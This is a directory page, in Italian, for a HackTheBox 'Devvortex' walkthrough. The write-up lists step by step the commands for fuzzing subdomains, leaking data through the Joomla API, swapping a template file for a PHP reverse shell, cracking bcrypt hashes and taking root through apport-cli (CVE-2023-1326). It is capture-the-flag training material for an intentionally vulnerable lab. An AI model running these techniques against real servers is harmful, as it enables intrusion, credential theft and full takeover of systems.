Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
DEVVORTEX — HackTheBox Devvortex walkthrough che copre il fuzzing dei sottodomini, l'enumerazione dell'API di Joomla, la web shell basata su template, il cracking dell'hash bcrypt e l'escalation dei privilegi tramite Apport-CLI CVE-2023-1326. | Kitploit
Strumenti/GitHubGitHub/r3fr4kt/devvortex
Password CrackingEscalation di PrivilegiAnalisi delle VulnerabilitàSfruttamento di Applicazioni WebRaccolta InformazioniCTFPenetration TestingEnumerazione SottodominiApprendimento e FormazioneLab e Pratica
GitHubr3fr4kt/devvortex
7h 57m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

DEVVORTEX

HackTheBox Devvortex walkthrough che copre il fuzzing dei sottodomini, l'enumerazione dell'API di Joomla, la web shell basata su template, il cracking dell'hash bcrypt e l'escalation dei privilegi tramite Apport-CLI CVE-2023-1326.

Vedi Repository

DEVVORTEX

HackTheBox: Devvortex — Machine Write-Up

Una guida tecnica completa che descrive in dettaglio la compromissione della macchina Devvortex su HackTheBox. Questo percorso dimostra Subdomain Fuzzing, Joomla API Enumeration, Template Modification per l'accesso iniziale, Database Hash Extraction & Cracking per il movimento laterale e lo sfruttamento di Apport-CLI (CVE-2023-1326) per l'escalation dei privilegi a root.


Executive Summary

  • Target OS: Linux
  • Difficulty: Easy
  • Domain: devvortex.htb
  • Subdomain: dev.devvortex.htb
  • Key Concepts: Subdomain Enumeration, Joomla CMS Exploitation, Information Disclosure, Bcrypt Hash Cracking, Sudo Abuse (apport-cli).

1. Reconnaissance & Enumeration

Port Scanning (Nmap)

È stata eseguita una scansione TCP veloce iniziale su tutte le porte:

root@kitploit:~
nmap -Pn -n -p- --open --min-rate 5000 <TARGET_IP>

Successivamente è stata eseguita una scansione di rilevamento dei servizi e delle versioni sulle porte aperte identificate:

Bash

root@kitploit:~
nmap -sCV --min-rate 5000 -p22,80 <TARGET_IP>

Hostfile Configuration

Aggiungi il dominio target di base alla tua tabella di risoluzione dei nomi host locale:

Bash

root@kitploit:~
sudo nano /etc/hosts
# Append: <TARGET_IP> devvortex.htb

Subdomain Discovery (FFUF)

Fuzzing degli host virtuali per identificare ulteriori risorse web:

Bash

root@kitploit:~
ffuf -u [http://FUZZ.devvortex.htb](http://FUZZ.devvortex.htb) -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ

Risultato: Scoperto dev.devvortex.htb. Aggiunto dev.devvortex.htb a /etc/hosts.

Directory Fuzzing

Enumerazione delle route sull'host virtuale appena scoperto:

Bash

root@kitploit:~
ffuf -u [http://dev.devvortex.htb/FUZZ](http://dev.devvortex.htb/FUZZ) -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt:FUZZ

Risultato: Scoperto l'endpoint /administrator, che espone un portale di autenticazione admin di Joomla.

2. Initial Access (Foothold)

Information Leakage via Joomla API

Sondaggio degli endpoint pubblici esposti dalla REST API di Joomla per raccogliere metriche applicative sensibili e utenti:

Bash

root@kitploit:~
curl -s [http://dev.devvortex.htb/api/index.php/v1/users?public=true](http://dev.devvortex.htb/api/index.php/v1/users?public=true)
curl -s [http://dev.devvortex.htb/api/index.php/v1/application?public=true](http://dev.devvortex.htb/api/index.php/v1/application?public=true)

Web Shell Injection via Site Templates

Utilizzando le credenziali scoperte durante l'enumerazione, accedi al portale /administrator di Joomla:

  1. Vai su System > Site Templates.

  2. Seleziona il template attivo e apri error.php.

  3. Sostituisci il contenuto di error.php con un payload standard di reverse shell PHP.

Inizializza un listener netcat locale:

Bash

root@kitploit:~
nc -lvnp 4444

Attiva l'esecuzione di error.php richiedendo una pagina inesistente o accedendo direttamente al file.

TTY Shell Stabilization

Una volta che la shell si connette come www-data, avvia una sessione PTY interattiva:

Bash

root@kitploit:~
python3 -c 'import pty; pty.spawn("/bin/bash")'

3. Lateral Movement (Logan)

Database Enumeration

Accedi al database MySQL locale utilizzando le credenziali recuperate dai file di configurazione web:

Bash

root@kitploit:~
mysql -u lewis -p

Interroga la tabella degli utenti per individuare gli hash delle credenziali memorizzati:

SQL

root@kitploit:~
SHOW DATABASES;
USE joomla;
SHOW TABLES;
SELECT username, password FROM sd4fg_users;

Offline Password Cracking

Estrai l'hash della password bcrypt per l'utente logan in un file locale:

Bash

root@kitploit:~
nano hash.txt

Cracka l'hash usando John the Ripper insieme a rockyou.txt:

Bash

root@kitploit:~
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Authenticating via SSH

Stabilisci una sessione SSH persistente come utente logan con le credenziali crackate:

Bash

root@kitploit:~
ssh [email protected]

User Flag

Bash

root@kitploit:~
cat user.txt

4. Privilege Escalation

Sudo Privileges Audit

Ispeziona i binari consentiti per l'utente logan:

Bash

root@kitploit:~
sudo -l

Output: L'utente può eseguire /usr/bin/apport-cli come root.

Apport-CLI Exploitation (CVE-2023-1326)

Controlla la versione installata di apport-cli:

Bash

root@kitploit:~
apport-cli --version

Ispeziona /var/crash per i file di report esistenti. Se vuoto, crea manualmente un file di crash:

Bash

root@kitploit:~
echo "ProblemType: Crash" > /var/crash/.crash

Avvia apport-cli sul file di crash creato usando sudo:

Bash

root@kitploit:~
sudo /usr/bin/apport-cli -c /var/crash/.crash
  1. Premi v per View report.

  2. Quando il paginatore (less) carica il contenuto, esci verso una shell di sistema inserendo:

Plaintext

root@kitploit:~
!/bin/bash

5. System Consolidation

Verifica l'elevazione a root:

Bash

root@kitploit:~
whoami
# Output: root

Root Flag

Bash

root@kitploit:~
cat /root/root.txt
Scarica lo strumento